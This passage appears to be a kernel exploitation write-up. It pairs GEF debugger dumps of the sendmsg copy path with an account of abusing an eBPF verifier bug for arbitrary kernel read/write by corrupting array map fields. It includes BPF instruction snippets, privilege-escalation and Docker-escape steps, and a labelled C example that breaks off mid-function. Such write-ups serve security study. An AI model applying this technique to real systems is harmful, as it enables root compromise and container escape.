[#6] 0xffffffff82fcb7b8 → sendmsg_copy_msghdr(msg=0xffff88806af87e58, umsg=0x7ffd9acfffe0, flags=0x4000, iov=0xffff88806af87c60)
[#7] 0xffffffff82fcb8bf → ___sys_sendmsg(sock=<optimized out>, msg=0x7ffd9acfffe0, msg_sys=0xffff88806af87e58, flags=0x4000, used_address=<optimized out>, allowed_msghdr_flags=<optimized out>)
[#8] 0xffffffff82fcbafc → __sys_sendmsg(fd=<optimized out>, msg=0x7ffd9acfffe0, flags=0x4000, forbid_cmsg_compat=0x1)
[#9] 0xffffffff81007e9c → do_syscall_64(nr=<optimized out>, regs=0xffff88806af87f58)
─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
gef➤ si
91 19: movq %r8,(%rdi)
[ Legend: Modified register | Code | Heap | Stack | String ]
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── registers ────
$rax : 0x0000000000000001 → 0x0000000000000001
$rbx : 0x0000000000000038 → 0x0000000000000038
$rcx : 0x0000000000000007 → 0x0000000000000007
$rdx : 0x0000000000000000 → 0x0000000000000000
$rsp : 0xffff88806af87ad8 → 0xffffffff81f222fd → 0x2789e8b8ebc48941 → 0x2789e8b8ebc48941
$rbp : 0x00007ffd9acfffe0 → 0x00007ffd9ad00020 → 0x732f6e75722f0001 → 0x732f6e75722f0001
$rsi : 0x00007ffd9acfffe0 → 0x00007ffd9ad00020 → 0x732f6e75722f0001 → 0x732f6e75722f0001
$rdi : 0xffff88806af87b40 → 0x0000000000000000 → 0x0000000000000000
$rip : 0xffffffff83ab2049 → 0x4808768d4807894c → 0x4808768d4807894c
$r8 : 0x00007ffd9ad00020 → 0x732f6e75722f0001 → 0x732f6e75722f0001
$r9 : 0xffffed100d5f0f6f → 0x000000f3f3f3f3f3 → 0x000000f3f3f3f3f3
$r10 : 0xffffed100d5f0f6e → 0x0000f3f3f3f3f300 → 0x0000f3f3f3f3f300
$r11 : 0xffff88806af87b77 → 0xff888066060848ff → 0xff888066060848ff
$r12 : 0x00007ffd9ad00018 → 0x00007f6a1c969483 → 0x000154880fc08548 → 0x000154880fc08548
$r13 : 0xffff88806af87b40 → 0x0000000000000000 → 0x0000000000000000
$r14 : 0x00007ffffffff000 → 0x00007ffffffff000
$r15 : 0x0000000000000000 → 0x0000000000000000
$eflags: [zero carry parity adjust sign trap INTERRUPT direction overflow resume virtualx86 identification]
$cs: 0x0010 $ss: 0x0018 $ds: 0x0000 $es: 0x0000 $fs: 0x0000 $gs: 0x0000
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────
0xffff88806af87ad8│+0x0000: 0xffffffff81f222fd → 0x2789e8b8ebc48941 → 0x2789e8b8ebc48941 ← $rsp
0xffff88806af87ae0│+0x0008: 0xffff88806af87e58 → 0xffff88806af87d20 → 0x0000000041b58ab3 → 0x0000000041b58ab3
0xffff88806af87ae8│+0x0010: 0x1ffff1100d5f0f64 → 0x1ffff1100d5f0f64
0xffff88806af87af0│+0x0018: 0x00007ffd9acfffe0 → 0x00007ffd9ad00020 → 0x732f6e75722f0001 → 0x732f6e75722f0001
0xffff88806af87af8│+0x0020: 0x0000000000000000 → 0x0000000000000000
0xffff88806af87b00│+0x0028: 0xffff88806af87c60 → 0xffff88806af87c80 → 0xffffffff812ca7f0 → 0xfc0000000000b848 → 0xfc0000000000b848
0xffff88806af87b08│+0x0030: 0xdffffc0000000000 → 0xdffffc0000000000
0xffff88806af87b10│+0x0038: 0xffffffff82fc0dde → 0xc68948c48949ff31 → 0xc68948c48949ff31
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── code:x86:64 ────
0xffffffff83ab203d <copy_user_generic_unrolled+125> rol DWORD PTR [rbx-0x163ef81e], 1
0xffffffff83ab2043 <copy_user_generic_unrolled+131> add esi, DWORD PTR [rdx+rdx*1+0x4c]
0xffffffff83ab2047 <copy_user_generic_unrolled+135> mov eax, DWORD PTR [rsi]
→ 0xffffffff83ab2049 <copy_user_generic_unrolled+137> mov QWORD PTR [rdi], r8
0xffffffff83ab204c <copy_user_generic_unrolled+140> lea rsi, [rsi+0x8]
0xffffffff83ab2050 <copy_user_generic_unrolled+144> lea rdi, [rdi+0x8]
0xffffffff83ab2054 <copy_user_generic_unrolled+148> dec ecx
0xffffffff83ab2056 <copy_user_generic_unrolled+150> jne 0xffffffff83ab2046 <copy_user_generic_unrolled+134>
0xffffffff83ab2058 <copy_user_generic_unrolled+152> and edx, edx
─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── source:arch/x86/lib/co[...].S+91 ────
86 movl %edx,%ecx
87 andl $7,%edx
88 shrl $3,%ecx
89 jz 20f
90 18: movq (%rsi),%r8
→ 91 19: movq %r8,(%rdi)
92 leaq 8(%rsi),%rsi
93 leaq 8(%rdi),%rdi
94 decl %ecx
95 jnz 18b
96 20: andl %edx,%edx
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────
[#0] Id 1, stopped 0xffffffff83ab2049 in copy_user_generic_unrolled (), reason: SINGLE STEP
[#1] Id 2, stopped 0xffffffff81218b90 in rebalance_domains (), reason: SINGLE STEP
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────
[#0] 0xffffffff83ab2049 → copy_user_generic_unrolled()
[#1] 0xffffffff81f222fd → copy_user_generic(len=0x0, from=0x7ffd9acfffe0, to=0xffff88806af87b40)
[#2] 0xffffffff81f222fd → raw_copy_from_user(size=<optimized out>, src=<optimized out>, dst=<optimized out>)
[#3] 0xffffffff81f222fd → _copy_from_user(to=0xffff88806af87b40, from=0x7ffd9acfffe0, n=0x38)
[#4] 0xffffffff82fc0dde → copy_from_user(n=<optimized out>, from=<optimized out>, to=<optimized out>)
[#5] 0xffffffff82fc0dde → copy_msghdr_from_user(kmsg=0xffff88806af87e58, umsg=0x7ffd9acfffe0, save_addr=0x0 <fixed_percpu_data>, iov=0xffff88806af87c60)
[#6] 0xffffffff82fcb7b8 → sendmsg_copy_msghdr(msg=0xffff88806af87e58, umsg=0x7ffd9acfffe0, flags=0x4000, iov=0xffff88806af87c60)
[#7] 0xffffffff82fcb8bf → ___sys_sendmsg(sock=<optimized out>, msg=0x7ffd9acfffe0, msg_sys=0xffff88806af87e58, flags=0x4000, used_address=<optimized out>, allowed_msghdr_flags=<optimized out>)
[#8] 0xffffffff82fcbafc → __sys_sendmsg(fd=<optimized out>, msg=0x7ffd9acfffe0, flags=0x4000, forbid_cmsg_compat=0x1)
[#9] 0xffffffff81007e9c → do_syscall_64(nr=<optimized out>, regs=0xffff88806af87f58)
─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
gef➤
92 leaq 8(%rsi),%rsi
[ Legend: Modified register | Code | Heap | Stack | String ]
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── registers ────
$rax : 0x0000000000000001 → 0x0000000000000001
$rbx : 0x0000000000000038 → 0x0000000000000038
$rcx : 0x0000000000000007 → 0x0000000000000007
$rdx : 0x0000000000000000 → 0x0000000000000000
$rsp : 0xffff88806af87ad8 → 0xffffffff81f222fd → 0x2789e8b8ebc48941 → 0x2789e8b8ebc48941
$rbp : 0x00007ffd9acfffe0 → 0x00007ffd9ad00020 → 0x732f6e75722f0001 → 0x732f6e75722f0001
$rsi : 0x00007ffd9acfffe0 → 0x00007ffd9ad00020 → 0x732f6e75722f0001 → 0x732f6e75722f0001
$rdi : 0xffff88806af87b40 → 0x00007ffd9ad00020 → 0x732f6e75722f0001 → 0x732f6e75722f0001
$rip : 0xffffffff83ab204c → 0x087f8d4808768d48 → 0x087f8d4808768d48
$r8 : 0x00007ffd9ad00020 → 0x732f6e75722f0001 → 0x732f6e75722f0001
$r9 : 0xffffed100d5f0f6f → 0x000000f3f3f3f3f3 → 0x000000f3f3f3f3f3
$r10 : 0xffffed100d5f0f6e → 0x0000f3f3f3f3f300 → 0x0000f3f3f3f3f300
$r11 : 0xffff88806af87b77 → 0xff888066060848ff → 0xff888066060848ff
$r12 : 0x00007ffd9ad00018 → 0x00007f6a1c969483 → 0x000154880fc08548 → 0x000154880fc08548
$r13 : 0xffff88806af87b40 → 0x00007ffd9ad00020 → 0x732f6e75722f0001 → 0x732f6e75722f0001
$r14 : 0x00007ffffffff000 → 0x00007ffffffff000
$r15 : 0x0000000000000000 → 0x0000000000000000
$eflags: [zero carry parity adjust sign trap INTERRUPT direction overflow resume virtualx86 identification]
$cs: 0x0010 $ss: 0x0018 $ds: 0x0000 $es: 0x0000 $fs: 0x0000 $gs: 0x0000
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────
0xffff88806af87ad8│+0x0000: 0xffffffff81f222fd → 0x2789e8b8ebc48941 → 0x2789e8b8ebc48941 ← $rsp
0xffff88806af87ae0│+0x0008: 0xffff88806af87e58 → 0xffff88806af87d20 → 0x0000000041b58ab3 → 0x0000000041b58ab3
0xffff88806af87ae8│+0x0010: 0x1ffff1100d5f0f64 → 0x1ffff1100d5f0f64
0xffff88806af87af0│+0x0018: 0x00007ffd9acfffe0 → 0x00007ffd9ad00020 → 0x732f6e75722f0001 → 0x732f6e75722f0001
0xffff88806af87af8│+0x0020: 0x0000000000000000 → 0x0000000000000000
0xffff88806af87b00│+0x0028: 0xffff88806af87c60 → 0xffff88806af87c80 → 0xffffffff812ca7f0 → 0xfc0000000000b848 → 0xfc0000000000b848
0xffff88806af87b08│+0x0030: 0xdffffc0000000000 → 0xdffffc0000000000
0xffff88806af87b10│+0x0038: 0xffffffff82fc0dde → 0xc68948c48949ff31 → 0xc68948c48949ff31
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── code:x86:64 ────
0xffffffff83ab2042 <copy_user_generic_unrolled+130> jmp 0xffffffffcfbd944a
0xffffffff83ab2047 <copy_user_generic_unrolled+135> mov eax, DWORD PTR [rsi]
0xffffffff83ab2049 <copy_user_generic_unrolled+137> mov QWORD PTR [rdi], r8
→ 0xffffffff83ab204c <copy_user_generic_unrolled+140> lea rsi, [rsi+0x8]
0xffffffff83ab2050 <copy_user_generic_unrolled+144> lea rdi, [rdi+0x8]
0xffffffff83ab2054 <copy_user_generic_unrolled+148> dec ecx
0xffffffff83ab2056 <copy_user_generic_unrolled+150> jne 0xffffffff83ab2046 <copy_user_generic_unrolled+134>
0xffffffff83ab2058 <copy_user_generic_unrolled+152> and edx, edx
0xffffffff83ab205a <copy_user_generic_unrolled+154> je 0xffffffff83ab206c <copy_user_generic_unrolled+172>
─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── source:arch/x86/lib/co[...].S+92 ────
87 andl $7,%edx
88 shrl $3,%ecx
89 jz 20f
90 18: movq (%rsi),%r8
91 19: movq %r8,(%rdi)
→ 92 leaq 8(%rsi),%rsi
93 leaq 8(%rdi),%rdi
94 decl %ecx
95 jnz 18b
96 20: andl %edx,%edx
97 jz 23f
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────
[#0] Id 1, stopped 0xffffffff83ab204c in copy_user_generic_unrolled (), reason: SINGLE STEP
[#1] Id 2, stopped 0xffffffff81218b90 in rebalance_domains (), reason: SINGLE STEP
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────
[#0] 0xffffffff83ab204c → copy_user_generic_unrolled()
[#1] 0xffffffff81f222fd → copy_user_generic(len=0x0, from=0x7ffd9acfffe0, to=0xffff88806af87b40)
[#2] 0xffffffff81f222fd → raw_copy_from_user(size=<optimized out>, src=<optimized out>, dst=<optimized out>)
[#3] 0xffffffff81f222fd → _copy_from_user(to=0xffff88806af87b40, from=0x7ffd9acfffe0, n=0x38)
[#4] 0xffffffff82fc0dde → copy_from_user(n=<optimized out>, from=<optimized out>, to=<optimized out>)
[#5] 0xffffffff82fc0dde → copy_msghdr_from_user(kmsg=0xffff88806af87e58, umsg=0x7ffd9acfffe0, save_addr=0x0 <fixed_percpu_data>, iov=0xffff88806af87c60)
[#6] 0xffffffff82fcb7b8 → sendmsg_copy_msghdr(msg=0xffff88806af87e58, umsg=0x7ffd9acfffe0, flags=0x4000, iov=0xffff88806af87c60)
[#7] 0xffffffff82fcb8bf → ___sys_sendmsg(sock=<optimized out>, msg=0x7ffd9acfffe0, msg_sys=0xffff88806af87e58, flags=0x4000, used_address=<optimized out>, allowed_msghdr_flags=<optimized out>)
[#8] 0xffffffff82fcbafc → __sys_sendmsg(fd=<optimized out>, msg=0x7ffd9acfffe0, flags=0x4000, forbid_cmsg_compat=0x1)
[#9] 0xffffffff81007e9c → do_syscall_64(nr=<optimized out>, regs=0xffff88806af87f58)
─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
gef➤
93 leaq 8(%rdi),%rdi
[ Legend: Modified register | Code | Heap | Stack | String ]
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── registers ────
$rax : 0x0000000000000001 → 0x0000000000000001
$rbx : 0x0000000000000038 → 0x0000000000000038
$rcx : 0x0000000000000007 → 0x0000000000000007
$rdx : 0x0000000000000000 → 0x0000000000000000
$rsp : 0xffff88806af87ad8 → 0xffffffff81f222fd → 0x2789e8b8ebc48941 → 0x2789e8b8ebc48941
$rbp : 0x00007ffd9acfffe0 → 0x00007ffd9ad00020 → 0x732f6e75722f0001 → 0x732f6e75722f0001
$rsi : 0x00007ffd9acfffe8 → 0x0000000000000015 → 0x0000000000000015
$rdi : 0xffff88806af87b40 → 0x00007ffd9ad00020 → 0x732f6e75722f0001 → 0x732f6e75722f0001
$rip : 0xffffffff83ab2050 → 0xee75c9ff087f8d48 → 0xee75c9ff087f8d48
$r8 : 0x00007ffd9ad00020 → 0x732f6e75722f0001 → 0x732f6e75722f0001
$r9 : 0xffffed100d5f0f6f → 0x000000f3f3f3f3f3 → 0x000000f3f3f3f3f3
$r10 : 0xffffed100d5f0f6e → 0x0000f3f3f3f3f300 → 0x0000f3f3f3f3f300
$r11 : 0xffff88806af87b77 → 0xff888066060848ff → 0xff888066060848ff
$r12 : 0x00007ffd9ad00018 → 0x00007f6a1c969483 → 0x000154880fc08548 → 0x000154880fc08548
$r13 : 0xffff88806af87b40 → 0x00007ffd9ad00020 → 0x732f6e75722f0001 → 0x732f6e75722f0001
$r14 : 0x00007ffffffff000 → 0x00007ffffffff000
$r15 : 0x0000000000000000 → 0x0000000000000000
$eflags: [zero carry parity adjust sign trap INTERRUPT direction overflow resume virtualx86 identification]
$cs: 0x0010 $ss: 0x0018 $ds: 0x0000 $es: 0x0000 $fs: 0x0000 $gs: 0x0000
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────
0xffff88806af87ad8│+0x0000: 0xffffffff81f222fd → 0x2789e8b8ebc48941 → 0x2789e8b8ebc48941 ← $rsp
0xffff88806af87ae0│+0x0008: 0xffff88806af87e58 → 0xffff88806af87d20 → 0x0000000041b58ab3 → 0x0000000041b58ab3
0xffff88806af87ae8│+0x0010: 0x1ffff1100d5f0f64 → 0x1ffff1100d5f0f64
0xffff88806af87af0│+0x0018: 0x00007ffd9acfffe0 → 0x00007ffd9ad00020 → 0x732f6e75722f0001 → 0x732f6e75722f0001
0xffff88806af87af8│+0x0020: 0x0000000000000000 → 0x0000000000000000
0xffff88806af87b00│+0x0028: 0xffff88806af87c60 → 0xffff88806af87c80 → 0xffffffff812ca7f0 → 0xfc0000000000b848 → 0xfc0000000000b848
0xffff88806af87b08│+0x0030: 0xdffffc0000000000 → 0xdffffc0000000000
0xffff88806af87b10│+0x0038: 0xffffffff82fc0dde → 0xc68948c48949ff31 → 0xc68948c48949ff31
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── code:x86:64 ────
0xffffffff83ab2045 <copy_user_generic_unrolled+133> adc cl, BYTE PTR [rbx+rcx*4+0x6]
0xffffffff83ab2049 <copy_user_generic_unrolled+137> mov QWORD PTR [rdi], r8
0xffffffff83ab204c <copy_user_generic_unrolled+140> lea rsi, [rsi+0x8]
→ 0xffffffff83ab2050 <copy_user_generic_unrolled+144> lea rdi, [rdi+0x8]
0xffffffff83ab2054 <copy_user_generic_unrolled+148> dec ecx
0xffffffff83ab2056 <copy_user_generic_unrolled+150> jne 0xffffffff83ab2046 <copy_user_generic_unrolled+134>
0xffffffff83ab2058 <copy_user_generic_unrolled+152> and edx, edx
0xffffffff83ab205a <copy_user_generic_unrolled+154> je 0xffffffff83ab206c <copy_user_generic_unrolled+172>
0xffffffff83ab205c <copy_user_generic_unrolled+156> mov ecx, edx
─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── source:arch/x86/lib/co[...].S+93 ────
88 shrl $3,%ecx
89 jz 20f
90 18: movq (%rsi),%r8
91 19: movq %r8,(%rdi)
92 leaq 8(%rsi),%rsi
→ 93 leaq 8(%rdi),%rdi
94 decl %ecx
95 jnz 18b
96 20: andl %edx,%edx
97 jz 23f
98 movl %edx,%ecx
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────
[#0] Id 1, stopped 0xffffffff83ab2050 in copy_user_generic_unrolled (), reason: SINGLE STEP
[#1] Id 2, stopped 0xffffffff81218b90 in rebalance_domains (), reason: SINGLE STEP
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────
[#0] 0xffffffff83ab2050 → copy_user_generic_unrolled()
[#1] 0xffffffff81f222fd → copy_user_generic(len=0x0, from=0x7ffd9acfffe8, to=0xffff88806af87b40)
[#2] 0xffffffff81f222fd → raw_copy_from_user(size=<optimized out>, src=<optimized out>, dst=<optimized out>)
[#3] 0xffffffff81f222fd → _copy_from_user(to=0xffff88806af87b40, from=0x7ffd9acfffe0, n=0x38)
[#4] 0xffffffff82fc0dde → copy_from_user(n=<optimized out>, from=<optimized out>, to=<optimized out>)
[#5] 0xffffffff82fc0dde → copy_msghdr_from_user(kmsg=0xffff88806af87e58, umsg=0x7ffd9acfffe0, save_addr=0x0 <fixed_percpu_data>, iov=0xffff88806af87c60)
[#6] 0xffffffff82fcb7b8 → sendmsg_copy_msghdr(msg=0xffff88806af87e58, umsg=0x7ffd9acfffe0, flags=0x4000, iov=0xffff88806af87c60)
[#7] 0xffffffff82fcb8bf → ___sys_sendmsg(sock=<optimized out>, msg=0x7ffd9acfffe0, msg_sys=0xffff88806af87e58, flags=0x4000, used_address=<optimized out>, allowed_msghdr_flags=<optimized out>)
[#8] 0xffffffff82fcbafc → __sys_sendmsg(fd=<optimized out>, msg=0x7ffd9acfffe0, flags=0x4000, forbid_cmsg_compat=0x1)
[#9] 0xffffffff81007e9c → do_syscall_64(nr=<optimized out>, regs=0xffff88806af87f58)
─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
gef➤
94 decl %ecx
[ Legend: Modified register | Code | Heap | Stack | String ]
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── registers ────
$rax : 0x0000000000000001 → 0x0000000000000001
$rbx : 0x0000000000000038 → 0x0000000000000038
$rcx : 0x0000000000000007 → 0x0000000000000007
$rdx : 0x0000000000000000 → 0x0000000000000000
$rsp : 0xffff88806af87ad8 → 0xffffffff81f222fd → 0x2789e8b8ebc48941 → 0x2789e8b8ebc48941
$rbp : 0x00007ffd9acfffe0 → 0x00007ffd9ad00020 → 0x732f6e75722f0001 → 0x732f6e75722f0001
$rsi : 0x00007ffd9acfffe8 → 0x0000000000000015 → 0x0000000000000015
$rdi : 0xffff88806af87b48 → 0xffff888066060850 → (bad)
$rip : 0xffffffff83ab2054 → 0x1074d221ee75c9ff → 0x1074d221ee75c9ff
$r8 : 0x00007ffd9ad00020 → 0x732f6e75722f0001 → 0x732f6e75722f0001
$r9 : 0xffffed100d5f0f6f → 0x000000f3f3f3f3f3 → 0x000000f3f3f3f3f3
$r10 : 0xffffed100d5f0f6e → 0x0000f3f3f3f3f300 → 0x0000f3f3f3f3f300
$r11 : 0xffff88806af87b77 → 0xff888066060848ff → 0xff888066060848ff
$r12 : 0x00007ffd9ad00018 → 0x00007f6a1c969483 → 0x000154880fc08548 → 0x000154880fc08548
$r13 : 0xffff88806af87b40 → 0x00007ffd9ad00020 → 0x732f6e75722f0001 → 0x732f6e75722f0001
$r14 : 0x00007ffffffff000 → 0x00007ffffffff000
$r15 : 0x0000000000000000 → 0x0000000000000000
$eflags: [zero carry parity adjust sign trap INTERRUPT direction overflow resume virtualx86 identification]
$cs: 0x0010 $ss: 0x0018 $ds: 0x0000 $es: 0x0000 $fs: 0x0000 $gs: 0x0000
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────
0xffff88806af87ad8│+0x0000: 0xffffffff81f222fd → 0x2789e8b8ebc48941 → 0x2789e8b8ebc48941 ← $rsp
0xffff88806af87ae0│+0x0008: 0xffff88806af87e58 → 0xffff88806af87d20 → 0x0000000041b58ab3 → 0x0000000041b58ab3
0xffff88806af87ae8│+0x0010: 0x1ffff1100d5f0f64 → 0x1ffff1100d5f0f64
0xffff88806af87af0│+0x0018: 0x00007ffd9acfffe0 → 0x00007ffd9ad00020 → 0x732f6e75722f0001 → 0x732f6e75722f0001
0xffff88806af87af8│+0x0020: 0x0000000000000000 → 0x0000000000000000
0xffff88806af87b00│+0x0028: 0xffff88806af87c60 → 0xffff88806af87c80 → 0xffffffff812ca7f0 → 0xfc0000000000b848 → 0xfc0000000000b848
0xffff88806af87b08│+0x0030: 0xdffffc0000000000 → 0xdffffc0000000000
0xffff88806af87b10│+0x0038: 0xffffffff82fc0dde → 0xc68948c48949ff31 → 0xc68948c48949ff31
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── code:x86:64 ────
0xffffffff83ab2049 <copy_user_generic_unrolled+137> mov QWORD PTR [rdi], r8
0xffffffff83ab204c <copy_user_generic_unrolled+140> lea rsi, [rsi+0x8]
0xffffffff83ab2050 <copy_user_generic_unrolled+144> lea rdi, [rdi+0x8]
→ 0xffffffff83ab2054 <copy_user_generic_unrolled+148> dec ecx
0xffffffff83ab2056 <copy_user_generic_unrolled+150> jne 0xffffffff83ab2046 <copy_user_generic_unrolled+134>
0xffffffff83ab2058 <copy_user_generic_unrolled+152> and edx, edx
0xffffffff83ab205a <copy_user_generic_unrolled+154> je 0xffffffff83ab206c <copy_user_generic_unrolled+172>
0xffffffff83ab205c <copy_user_generic_unrolled+156> mov ecx, edx
0xffffffff83ab205e <copy_user_generic_unrolled+158> mov al, BYTE PTR [rsi]
─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── source:arch/x86/lib/co[...].S+94 ────
89 jz 20f
90 18: movq (%rsi),%r8
91 19: movq %r8,(%rdi)
92 leaq 8(%rsi),%rsi
93 leaq 8(%rdi),%rdi
→ 94 decl %ecx
95 jnz 18b
96 20: andl %edx,%edx
97 jz 23f
98 movl %edx,%ecx
99 21: movb (%rsi),%al
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────
[#0] Id 1, stopped 0xffffffff83ab2054 in copy_user_generic_unrolled (), reason: SINGLE STEP
[#1] Id 2, stopped 0xffffffff81218b90 in rebalance_domains (), reason: SINGLE STEP
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────
[#0] 0xffffffff83ab2054 → copy_user_generic_unrolled()
[#1] 0xffffffff81f222fd → copy_user_generic(len=0x0, from=0x7ffd9acfffe8, to=0xffff88806af87b48)
[#2] 0xffffffff81f222fd → raw_copy_from_user(size=<optimized out>, src=<optimized out>, dst=<optimized out>)
[#3] 0xffffffff81f222fd → _copy_from_user(to=0xffff88806af87b40, from=0x7ffd9acfffe0, n=0x38)
[#4] 0xffffffff82fc0dde → copy_from_user(n=<optimized out>, from=<optimized out>, to=<optimized out>)
[#5] 0xffffffff82fc0dde → copy_msghdr_from_user(kmsg=0xffff88806af87e58, umsg=0x7ffd9acfffe0, save_addr=0x0 <fixed_percpu_data>, iov=0xffff88806af87c60)
[#6] 0xffffffff82fcb7b8 → sendmsg_copy_msghdr(msg=0xffff88806af87e58, umsg=0x7ffd9acfffe0, flags=0x4000, iov=0xffff88806af87c60)
[#7] 0xffffffff82fcb8bf → ___sys_sendmsg(sock=<optimized out>, msg=0x7ffd9acfffe0, msg_sys=0xffff88806af87e58, flags=0x4000, used_address=<optimized out>, allowed_msghdr_flags=<optimized out>)
[#8] 0xffffffff82fcbafc → __sys_sendmsg(fd=<optimized out>, msg=0x7ffd9acfffe0, flags=0x4000, forbid_cmsg_compat=0x1)
[#9] 0xffffffff81007e9c → do_syscall_64(nr=<optimized out>, regs=0xffff88806af87f58)
─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
gef➤ info registers cr4
cr4 0x3006f0 [ SMAP SMEP OSXMMEXCPT OSFXSR PGE MCE PAE PSE ]

0x02 Reading arbitrary values through a map

The idea, following the Anquanke writeup, is this: use the bug to set r6 to 1 while the verifier believes it is 0, load a value from the map into r8, then multiply r6 by r8, which would give arbitrary address read/write. That looked great in theory, but it turns out that after the multiplication the verifier marks r6 as unknown....

0x00 Bypass

Since that doesn't work, I thought of loading several BPF programs: each loaded program is used only once and then closed, and the immediate that r6 is multiplied by is changed for the next one, which gives arbitrary read/write. Then I found that a mov immediate can only be 32 bits wide, so the 64-bit multiplier has to be assembled with the following operations:

mov r8, r6
mul r6, <low 32 bits of the multiplier>
mul r8, <high 32 bits of the multiplier>
shl r8, 32
add r6, r8

Actually the simplest way is to use the BPF_LD_IMM64 instruction for this. But then I found that a map's value size is at most 32 bits, which means this is still not a true arbitrary read/write: it can only read/write up to 4 GB beyond the value. So here is another idea. Since the key and value types are both u32, take the array map as an example: a lookup_elem call ends up in array_map_lookup_elem:

static void *array_map_lookup_elem(struct bpf_map *map, void *key)
{
	struct bpf_array *array = container_of(map, struct bpf_array, map);
	u32 index = *(u32 *)key;

	if (unlikely(index >= array->map.max_entries))
		return NULL;

	return array->value + array->elem_size * (index & array->index_mask);
}

Looking at this function, if we change elem_size, index_mask and max_entries to 0xffffffff, the next map lookup would give arbitrary address read/write. It seemed a bit complicated, so I didn't try it, but it should work. At the time I didn't do it because splitting the address seemed too complex; thinking about it now, it isn't. To read or write an arbitrary address you only need to compute

offset_address = address - array->value
index  = offset_address >> 32
offset = offset_address % 0x100000000

and then

BPF_ALU64_IMM(BPF_MOV, BPF_REG_6, index),
BPF_STX_MEM(BPF_DW, BPF_REG_10, BPF_REG_6, -8),
BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),
BPF_ADD64_IMM(BPF_REG_2, -8),
BPF_LD_MAP_FD(BPF_REG_1, cmd_fd),
BPF_MAP_LOOKUP(),
BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
BPF_EXIT_INSN(),
BPF_LDX_MEM(BPF_DW, BPF_REG_6, BPF_REG_0, offset),
BPF_ALU64_IMM(BPF_MOV, BPF_REG_0, 0)

That should work; if the verifier check fails, consider setting r6 = 1 (which the verifier believes is 0) and then doing mul r6, index, which should pass.

0x05 Privilege escalation and Docker escape

After my other arbitrary read/write approaches were ruled out, I could only follow ZDI's method for privilege escalation. This vulnerability can also be used for a Docker escape; the reference outlines the steps as:

Use the kernel vulnerability to enter the kernel context
Obtain the current process's task_struct
Walk back the task list to obtain the task_struct of pid 1 and copy its relevant data
Switch the current namespace
Open a root shell, completing the escape

Then there is ZDI's privilege escalation method itself. First, a small pitfall: ZDI's primitive reads and writes 4 bytes at a time, but an address is 8 bytes, so casts are unavoidable. For those casts use unsigned int rather than int: converting an int to uint64_t sign-extends, so when the low 32 bits have their top bit set, the high 32 bits all become 1. The arbitrary read itself was correct, but the value was parsed wrongly, and everything that used it afterwards was wrong too.
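The sign-extension pitfall above, as an added C example that is not part of the original exploit: a constructed 8-byte little-endian value is read back in two 4-byte halves and reassembled once through int and once through unsigned int; high_half/low_half are the inverse, the same high/low decomposition the text applies to offset_address for the array map lookup. The sample bytes and all function names are constructed for this example.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constructed sample: the 8 little-endian bytes of the made-up kernel
 * address 0xffff888081234567. Its low half has bit 31 set, which is
 * exactly the case where a signed 32-bit intermediate goes wrong. */
static const uint8_t sample_addr_bytes[8] = {
    0x67, 0x45, 0x23, 0x81, 0x80, 0x88, 0xff, 0xff
};

/* Stand-ins for a 4-byte read primitive, typed once as int and once as
 * unsigned int (memcpy keeps the reinterpretation well-defined). */
static int read32_as_int(const uint8_t *p, size_t off)
{
    int32_t v;
    memcpy(&v, p + off, sizeof v);
    return v;
}

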